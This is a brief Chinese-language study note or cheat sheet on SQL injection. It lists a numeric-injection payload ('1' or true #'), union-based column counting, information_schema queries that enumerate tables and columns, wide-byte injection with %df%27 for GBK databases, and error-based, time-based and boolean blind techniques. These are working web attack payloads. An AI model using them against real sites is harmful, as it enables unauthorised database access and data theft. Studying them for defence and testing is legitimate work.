语法
数字注入
1’ or true #
联合注入
union
order by * 可以爆出字段数
group by *
version()
database()
user()
查看表:select (table_name) from information_schema.TABLES where TABLE_SCHEMA=database()或者’kuming’
查看字段:select (column_name) from information_schema.COLUMNS where TABLE_NAME = ‘biaoming’
宽字节注入
%df%27
用于gbk编码的sql
报错注入
利用sql的函数bug错误回显得到数据
延时注入
在没有回显的情况下利用页面刷新时间来判断注入条件成立与否
与布尔注入如出一辙
insert、select、delete、update注入
四大基础注入方式